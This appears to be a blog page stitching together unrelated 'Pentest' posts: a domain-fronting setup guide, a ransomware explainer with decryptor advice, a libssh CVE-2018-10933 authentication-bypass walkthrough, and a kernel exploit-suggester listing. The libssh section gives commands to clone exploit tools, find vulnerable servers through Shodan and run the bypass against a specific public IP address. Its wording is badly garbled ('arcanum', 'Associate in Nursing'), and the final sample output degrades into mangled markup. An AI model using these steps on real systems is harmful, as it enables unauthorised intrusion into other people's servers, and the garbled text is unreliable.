Articles by "Pentest"
Showing posts with label Pentest. Show all posts



Broadly speaking, we can say that the fronting technique consists of obfuscating the data source of a site. 
This is something that has existed for a long time, but lately it has recovered its relevance due to the barriers that have been raised on the internet to censor, filter and prevent access to certain content, generally for political or ideological interests.
Fronting works in the application layer and allows users to access content that has been blocked by the most common techniques: IP blocking, DNS filtering and even packet inspection, since the header of these is that of a Authorized origin, and only the actual content is revealed once the connection has been authorized and established. It should be noted that the fronting only works on HTTPS protocol. 
There are many tutorials on the internet about how to use CDN (Content Delivery Network) in Amazon Web Services to provide content from different sources in case one of them is offline. However, we have not found explanations on how to do this when the data source does not come from a site hosted on AWS, that's why we decided to create this guide.

In our example we will use the following names: 



subdomain.domain.com : Our subdomain with which we will do the obfuscation 
www.otrodominio.com/routa/al/subdominio : The origin of the data that we will show in sub.domain.com 

The first thing that we must do is enable the fronting in the hosting of another domain.com , since in most it is disabled by default to avoid phishing. (Later we will make a guide to know if your domain is vulnerable to fronting by malicious users.) 
I can not tell you in detail how to enable fronting in your hosting, as it is different in each one. In any case, you can always check with the provider's support team.

Then we must go to AWS and create a CNAME for sub.domain.com . For now it does not matter where you point, since we 
'll change it later. We go to Route53, select our zone and create a new record with "Create Record Set":

Here we select as CNAME type, we put our subdomain as a name and as a source anything, for example, www.google.com :


Then we go to Cloudfront and create a new distribution:


We select the Web option and place the domain of the data source and the route, if there is one.
We place the alternative name that we chose for the data source and select the type of certificate. In this case, we chose a public one generated by Amazon for our domain:

We accept and while this is done, which will take about 20 minutes, we select the name of the cloudfront generated by this distribution. It is a name of type a1b2c3d4c5.cloudfront.net. 
We copy it and go back to the CNAME that we created before and replace whatever we have put (in this example it was www.google.com ) for this new domain. 

Finally, we connect by ssh to the AWS hosting with the method that we have configured (pem file of certificate, user and password, etc.) and, depending on the version of apache that we have installed, navigate to / etc / apache2 / and edit apache2. conf or go to / etc / apache2 / sites-available / and edit domain.com.conf (the name will be that of your domain) and add the following lines: 
 
<VirtualHost *: 80> 
        ServerName subdomain.domain.com 
        ServerAlias http://subdomain.domain.com
        ProxyPass / https://www.otrodomain.com/route/al/subdomain
        ProxyPassReverse / https://www.otrodomain.com / path / to / subdomain
</ VirtualHost> 
<VirtualHost *: 80> 
        ServerName subdomain.domain.com 
        ServerAlias https://subdomain.domain.com
        ProxyPass / https://www.otrodominio.com/ruta/al/subdominio
        ProxyPassReverse / https://www.otrodominio.com/ruta/al/subdominio
</ VirtualHost>
 
with this we make sure that whatever you enter the user request to subdomain.domain.com, arrive by https to anotherdomain.com/path/al/subdomain . 

Finally, once the CloudFront has finished creating the distribution (the status will change to deployed and it will no longer say in progress ), we can try the fronting by typing subdomain.domain.com/index.php or a path that is only found in www. .otherdomain.com / route / to / subdomain / , for example www.otrodomain.com/ruta/al/subdominio/otra/ruta/test.php . We put subdomain.domain.com/otra/ruta/test.php and voila!there is our content from anotherdomain.com and the URL that the browser shows us is subdomain.domain.com ! 

Ransomware-shl
For several days, many people had been contacting me to ask me about how to recover the files infected by the Ransomware, so I decided to make this post to explain how to perform the process and recover your files. First of all clarify that I have not had any experience with this type of virus, this post is a compilation of the best post, these are taken from recognized sites and will be in italics , the original links will be in the heading of each section. Texts and personal opinions will be in this source.
What is Ransomware?  Ransomware is a malicious software that by infecting our computer gives the cybercriminal the ability to block the PC from a remote location and encrypt our files, taking control of all information and stored data. To unlock it the virus launches a pop-up window asking us to pay a ransom.
Example image of a PC infected by Ransonware:
 
How does Ransomware work? 
  1) It is camouflaged within another file or desirable program for the user that invites to click: attachments in emails, videos of pages of doubtful origin or even in systems updates and programs in principle reliable as Windows or Adobe Flash.
 2) Once it has penetrated into the computer, the malware activates and causes the entire operating system to be blocked and sends the warning message with the threat and the amount of the "ransom" that has to be paid to recover all the information . The message may vary depending on the type of ransomware we face: pirated content, pornography, fake virus ...
  3) To enhance the uncertainty and fear of the victim, sometimes include in the threat the IP address, the Internet provider and even a photograph captured from the webcam.
 How to avoid Ransomware? The practices to avoid being infected by this malware are common to those that we must follow to avoid other viruses.
- Keep our operating system updated to avoid security flaws.
- Have a good antivirus product installed and always keep it updated.
- Do not open emails or files with unknown senders.
- Avoid browsing unsafe pages or with unverified content.

Ransomware in Windows.

This guide provides instructions and a link to download and use the latest Trend Micro Ransomware File Decryptor tool  to try to decrypt files encrypted by certain types of ransomware. As an important reminder, the best protection against ransomware is preventing it from ever reaching your system. While Trend Micro is constantly working to update our tools, ransomware programmers are also constantly changing their methods and tactics, which can make older versions of tools like this obsolete over time. Customers are recommended to follow the following safety practices: 
1) Make sure you have regular backups of the most important and critical data offline or in the cloud.
2) Make sure that you are always applying the latest critical updates and patches for your operating system and other key system software (eg browsers).
 
3) Install the latest versions of configurations and apply the best security tools such as Trend Micro to provide mutli-layer security.
  Types of Ransomware supported.
The following table shows the ransomware versions supported by this tool.
Extension of the encrypted file
  1. Click the Download button to get the latest version of Trend Micro Ransomware File Decryptor tool. Uncompress (unzip) and then run RansomwareFileDecryptor.exe or TeslacryptDecryptor.exe Download RansomwareFileDecryptor 
    Download TeslacryptDecryptor
     
  2. After executing it, he accepts the license to proceed.
  3. After accepting the license, follow step by step what the tool tells you.

    Anti-Ransomware

Due to the advanced encryption of this particular Crypto-ransomware, only partial data decryption is possible at present in the files affected by CryptXXX V3.
The tool will try to solve certain file formats after the decryption attempt, including DOC, DOCX, XLS, XLSX, PPT and PPTX (common Microsoft Office).
The fixed file will have the same name as the original file with "_fixed" added to the file name and will be placed in the same place. When you open the fixed file with Microsoft Office, you can present a message to try to repair the file again, and this process may be able to recover the document.
Keep in mind that due to the different versions of particular behaviors of Microsoft Office files, it is not guaranteed that by this method the document will be completely recovered. However, for other files after partial data decryption, users may have to use a third-party corrupted file recovery tool (such as the JPEGsnoop open source program ) to try to recover the entire file.
An example of this would be a photo or an image file that was partially recovered may show parts of the image, but not the entire image. A user can then determine if the file is important enough to use a third-party tool or request the assistance of a third-party professional file recovery service.
Image before being infected:

Image after recovery:

Linux Ransomware

Windows is the most used operating system of the entire network, so most developers, like hackers, usually launch their applications for this system. However, little by little the market share of Linux, especially in professional environments and servers, continues to grow, which increasingly calls the attention of these in order to take advantage of this operating system.
Ransomware is one of the most dangerous types of malware of recent times. When this malware infects a user it automatically begins to encrypt all of its data so that the only way to recover it is by paying a "ransom", without the guarantee that, even if we pay these pirates, we will receive the decryption key.
Until now, this type of malware only affected Windows users, who also had a difficult enough time to defend themselves against this threat since it is difficult to identify and eliminate even the main antivirus signatures, however, it is possible that users of Windows is no longer the only ones affected by this.
Doctor Web, an important Russian security company, has detected the first ransomware threat for Linux users, especially focused on infecting and hijacking all the servers used to host web pages. This threat, called by the security company as Linux.Encoder.1, is written in C language and uses the PolarSSL library to establish secure connections that are impossible to capture and then install as a service, or daemon, of the system before starting its dreaded function.
How does this Ransomware work?
 Once operating in the system, this new malware analyzes the file system in search of all the directories used mainly for the development and hosting of web pages. Once detected, it begins to encrypt all the files that are hosted there, along with all the documents, personal files and multimedia files that are found on the computer or server. For encryption uses an AES-CBC-128 algorithm.
When it finishes its task it creates a text file with the necessary instructions to recover the files, as well as the address of payment and the amount to enter that, in this case, is 1 Bitcoin.
Reach this Ransomware.
Home users are also at risk from this ransomware
Although the main objectives of this ransomware are the servers of web pages, the users are not free from danger. According to security experts, this malware can easily be ported to infect and attack all types of equipment, for example, NAS devices that are increasingly common in domestic environments as a server or network mass storage system.
Luckily, not everything is as simple as it seems. Thanks to the Linux permissions system, to run this malware on a Linux server or computer, it is necessary to do it with root permissions, so if we control the superuser account, it is easier for us to not be affected by this malware. , unless you take advantage of a privilege escalation vulnerability or run it manually with those permissions.
How to recover my files in Linux?
Bitdefender is the first security provider to release a decryption tool that automatically restores the affected files to their original state. The tool determines the IV and the encryption key by just analyzing the file, then performs decryption, followed by permission fixation. If you can boot the compromised operating system, download the script and run the program under the root user. 
To download the tool and know how to execute it, we invite you to read this BitDefender post .
We must clarify that after your system has been infected by the Ransomware, it is convenient to take a backup of your data and format it to be sure that the virus is no longer in our PC. After restoring your data to the new system, it is recommended to examine them with your antivirus software.

Recommendations:

1) Try to create restore points and backup copies of your files at least twice a week.
2) Be cautious when executing a program or script, only do it if the site of origin is reliable.
3) Use good Antivirus software (if you are a Windows user), such as Kaspersky , EsetNod Smart Security and Clamav (RECOMMENDED) since the latter is also available for GNU / Linux and is open source.
4) Use Firefox and follow the navigation techniques of these post: How to navigate anonymously without being tracked and Privacy and security in the network .
5) In addition to the aforementioned tools we can use these other tools that also have the same purpose in case the previous one does not give us the expected results.
Petya
6) Use GNU / Linux as the operating system.
LIBSSH BACKGROUND
Computers everywhere the globe believe the libssh library. The issue with this is often the discharge of bug CVE-2018-10933. Unfortunately for hackers, this server bug was patched shortly when the discharge. Fortunately, however, for hackers, barely anyone takes the time to update their SSH libraries, so score there.
How the Exploit Works
In a traditional SSH session, the user can decide to log in with a username and arcanum, and according to whether or not the credentials are valid, the server will accept or reject the connection. In the example below, we tend to decide to log in to a server running libssh with the incorrect arcanum by writing ssh username@ipaddress into a terminal window.
ssh root@159.180.132.163
The authenticity of host '159.180.132.163 (159.180.132.163)' can't be established. RSA key fingerprint is SHA256:Vkx9gDp1E/df1Yn0bDrgXIIYcTnyCVU6vmgqLKKqrhQ. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '159.180.132.163' (RSA) to the list of known hosts. root@159.180.132.163's password: Permission denied, please try again. root@159.180.132.163's password: Permission denied, please try again. root@159.180.132.163's password: root@159.180.132.163: Permission denied (publickey,keyboard-interactive,password).
Because we tend to don’t grasp the arcanum, the decide to connect is rejected, and we are kept out of the server. On high of this, we tend to ar illegal from connecting to it server for a few time if we tend to try and log in too persistently and fail.
In versions of libssh with the bug in question, a user will trick the system into thinking they're already attested by causing Associate in Nursing sudden message indicating the association already succeeded, bypassing the need to supply a password. It permits Associate in Nursing assailant to realize complete management over the affected system with no information of the arcanum, and it represents a vital vulnerability in any system with affected versions of libssh.

So How Does This Bug Work?
Imagine if you may gain access to a stranger’s house by just telling them you reside there. In this trick, we tend to skip the method of proving we tend to belong with a arcanum and instead send a “success” message.

This bug works when an attacker doesn’t attempt to log within the traditional method in the least, and instead sends the server a message that looks to verify that the attacker has already authenticated. This “authentication succeeded” message confuses the server into granting access while not a password, whole bypassing the conventional security of the system.

Step 1: INSTALL TOOLS AND DEPENDENCIES

The first program we'll use to scan for vulnerable devices is named Nmap, which might simply be installed. On Kali, it ought to than by default, however if it’s not, you'll be able to quickly download it with the following command.
apt install nmap
In order to find if a device we have a tendency to discover is vulnerable, we'll be using the Python program libssh-scanner. It’s is written in Python 2.7, thus if you simply have Python three installed, you'll need to make certain to additionally install Python a pair of.7.

To install libssh-scanner, you need to clone the libssh-scanner repository by typewriting the subsequent into a terminal window.
git clone https://github.com/leapsecurity/libssh-scanner.git
Then, once navigating inside the directory and listing its contents, you need to install the specified libraries by running the pip command seen below.

cd libssh-scanner
ls
pip install -r requirements.txt
Next, you would like to in addition install the program to thanperform the attack ,. This time, you’re cloning the “libSSH-Authentication-Bypass” repository four and installing any dependencies using the subsequent commands
git clone https://github.com/purplesec/libSSH-Authentication-Bypass.git
cd libSSH-Authentication-Bypass
pip install -r requirements.txt
Step 2: USE NMAP TO SCAN FOR VULNERABILITIES
The first step to fixing or exploiting a vulnerable device is finding it, and it’s comparatively simple to seek out devices on your native network that will need attention. To do so, we'll use a program referred to as Nmap to find devices running an SSH server and verify if libssh is running on them. Nmap is an essential tool in any hacker’s toolkit, enabling  one to quickly scan and see all hosts and services on a given network or IP range.
In this case, we'll scan the devices connected domestically to our network, and Nmap can tell us whether or not every device on the network is using a vulnerable version of libssh. To follow this guide, you'll got to install Nmap, however if you use Kali Linux, you possible have already got Nmap installed.
To scan and find out all devices on the local network using libssh, open a terminal window and enter the subsequent nmap command.
nmap -sV -p22 192.168.0.0/24
Breaking down the command, nmap tells the pc that we would like to really begin using Nmap, whereas -sV tells Nmap that we would like to perform a service scan, that grabs the banner of any service utilized by on an open port. The flag -p22 tells Nmap to only scan devices on port 22, that is the standard port for SSH communication. whereas this won't realize devices that use SSH on a different port, it'll dramatically reduce search times.
Finally, the target expressed as a subnet range; the primary three bytes of this may be unique to your search. once scanning a range of computers instead of only one, the 0/24 at the end is essential for looking the complete subnet. If you would like to find your subnet range, you'll use a tool like “ipcalc” which can calculate it for you. To do so, find your IP address from typewriting ifconfig , then type ipcalc yourIP (replace “yourIP” along with your IP address).
The command will come back a list of devices connected to the subnet, also as some info gathered from the scanned port. in this case we tend to ar trying to find any targets that ar using a version of libssh earlier than 0.7.6. you'll expect to see AN output like below
Nmap scan report for 172.16.42.1
Host is up (0.0098s latency).

PORT   STATE  SERVICE VERSION
22/tcp closed ssh

Nmap scan report for 172.16.42.32
Host is up (0.21s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     libssh 0.7.2 (protocol 2.0)

Nmap scan report for 172.16.42.53
Host is up (0.079s latency).

PORT   STATE  SERVICE VERSION
22/tcp closed ssh

Nmap scan report for 172.16.42.67
Host is up (0.024s latency).

PORT   STATE    SERVICE VERSION
22/tcp filtered ssh

Step 3: DISCOVER LIBSSH VULNERABLE SERVERS
The vast majority of vulnerable servers are accessible via a remote network, thus we'll need to search during a different way to find devices not connected directly to our LAN.
To find a remote target, you'll need to make the most of a service known as Shodan 4, a look engine that may find any device connected to internet — unlike Google that only returns results from web servers on port 80. as an example, instead of directing you to a web site attempting to sell you security cameras, Shodan will direct you to the login page of functioning IP cameras, potentially granting you access to the camera given the default password is unchanged.
Shodan can have indexed several vulnerable SSH servers, that we will search for each by port number and different keyword searches that reveal hosts running versions of libssh before 0.7.6 that we know to be affected by the vulnerability.
To start, register for a free account, that allows you to look at the primary two pages of any search question, or about 20 unique devices. Then, to find servers vulnerable to the libssh exploit, you’ll need three terms within the search:
  • port:22 , that is that the default port for the SSH protocol. even if SSH may be moved  to any unused port, this isn’t too common because all it really will is forestall the server from being found with an easy scan for port 22.
  • LibSSH , that returns any server that advertises using the libssh library, indicating that they're potentially exploitable.
  • 0.7.* , that limits the results of the search to devices that ar using versions of libssh that begin with “0.7.” and excludes a lot of up-to-date versions from the results. while you'll still get some results that ar patched, you’ll eliminate most of the a lot of updated devices with this filter.
The search above can come back a list of IP addresses that may be vulnerable to this attack, along side some a lot of info that Shodan was able to retrieve. Shodan’s info will include a banner pull, the location of the device, the latest activity, and also the organization in control of the server.


Step 4: TESTING LIBSSH VULNERABILITY ON SERVER
nce you've got gathered a listing of targets liable to the exploit, either local or remote, you'll use “libssh-scanner” to scan target IP addresses and determine if they’re still possible vulnerable. other tools will go even more to try establishing a shell, however it's important to note that accessing another device using SSH while not permission may violate the pc Fraud and Abuse Act. depending on who owns the device you access, this will land you in serious legal trouble.
In addition to legal issues, you should be wary of connecting to devices from your real IP address that might be purposely vulnerable to this exploit. Honeypots ar often created this way to attract amateur hackers, and you'll end up within a device configured as a trap.
Now, use libssh-scanner to see if the targets gathered in steps 2 and 3 can really be vulnerable to the exploit. To do this, create a TXT file containing all of The Ip addresses found in steps 2 and 3, with each IP address separated by new lines. Name this text file “ips1.txt” and place it within a similar folder as libssh-scanner was downloaded to earlier in step 1.
Once within the directory, enter the following command into a terminal window.
python libsshscan.py --port 22 --aggressive ips1.txt
The command can run Python 2.7, scan every IP address within the text file, and determine if the target is really vulnerable to the CVE-2018-10933 security flaw. As you'll see below, performing the scan  narrowed down the list of potential targets from Shodan to only one — 159.180.132.163.
python libsshscan.py --aggressive --port 22 ips1.txt libssh scanner 1.0.4 Searching for Vulnerable Hosts... * 52.151.63.100:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.2')* 13.57.20.28:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* 132.206.51.74:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* 18.221.40.109:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* 52.1.165.128:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* 54.86.221.162:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* 52.173.202.21:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')* 54.193.60.245:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')! 159.180.132.163:22 is likely VULNERABLE to authentication bypass (b'SSH-2.0-libssh-0.7.2')* 34.194.133.107:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
Scanner Completed with success
To check the one result, use libSSH-Authentication-Bypass to check the attack.
 change directory into the folder you downloaded libSSH-Authentication-Bypass to 
previously in step 1, 
and enter the subsequent command, work “159.180.132.163” with the IP address 
you would like to scan.
python3 libsshauthbypass.py --host 159.180.132.163
The command returns the subsequent output on a server that has been partially patched however 
continues to be vulnerable to the authentication bypass.
python3 bypasswithfakekey.py --host 159.180.132.163
DEBUG:paramiko.transport:starting thread (client mode): 0x74a0d30
DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.0.8
DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-libssh-0.7.2
INFO:paramiko.transport:Connected (version 2.0, client libssh-0.7.2)
DEBUG:paramiko.transport:kex algos:['diffie-hellman-group14-sha1', 'diffie-hellman-group1-sha1'] server key:['ssh-rsa'] client encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] server encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] client mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] server mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] client compress:['none', 'zlib', 'zlib@openssh.com'] server compress:['none', 'zlib', 'zlib@openssh.com'] client lang:[''] server lang:[''] kex follows?False
DEBUG:paramiko.transport:Kex agreed: diffie-hellman-group1-sha1
DEBUG:paramiko.transport:Cipher agreed: aes128-ctr
DEBUG:paramiko.transport:MAC agreed: hmac-sha2-256
DEBUG:paramiko.transport:Compression agreed: 
If you see a message indicating the connection is successful , then you’ve confirmed the vulnerability on the device
you’re testing. If the connection fails, otherwise you see a part successful result like higher than, then you’ve
confirmed that the difficulty doesn't affect the target (even tho' it should need to be updated anyway if you get a
partial success)


This program run without arguments will perform a 'uname -r' to grab the Linux Operating Systems release version, and return a suggestive list of possible exploits. Nothing fancy, so a patched/back-ported patch may fool this script.
This script has been extremely useful on site and in exams
Usage
perl ./Linux_Exploit_Suggester.pl -k 4.11.7
root privilege escalation opportunities on Linux machine,

Sample Output

$ perl ./Linux_Exploit_Suggester.pl -k 2.6.28

Kernel local: 2.6.28

Possible Exploits:
[+] sock_sendpage2
   Alt: proto_ops    CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9436
[+] half_nelson3
   Alt: econet    CVE-2010-4073
   Source: http://www.exploit-db.com/exploits/17787/
[+] reiserfs
   CVE-2010-1146
   Source: http://www.exploit-db.com/exploits/12130/
[+] pktcdvd
   CVE-2010-3437
   Source: http://www.exploit-db.com/exploits/15150/
[+] american-sign-language
   CVE-2010-4347
   Source: http://www.securityfocus.com/bid/45408/
[+] half_nelson
   Alt: econet    CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/6851
[+] udev
   Alt: udev <1 .4.1="" alt:="" c="" can_bcm="" cve-2009-1185="" cve-2009-2692="" cve-2009-3547="" cve-2010-0415="" cve-2010-2959="" cve-2010-3081="" cve-2010-3301="" cve-2010-3848="" cve-2010-3850="" data="" do_pages_move="" econet="" enlightenment="" exit_notify="" exploits="" half_nelson1="" half_nelson2="" http:="" ia32syscall="" pipe.c_32bit="" pre="" ptrace_kmod2="" robert_you_suck="" sieve="" sock_sendpage="" source:="" spenders="" video4linux="" vulnerabilities="" wunderbar_emporium="" www.exploit-db.com="" www.securityfocus.com="">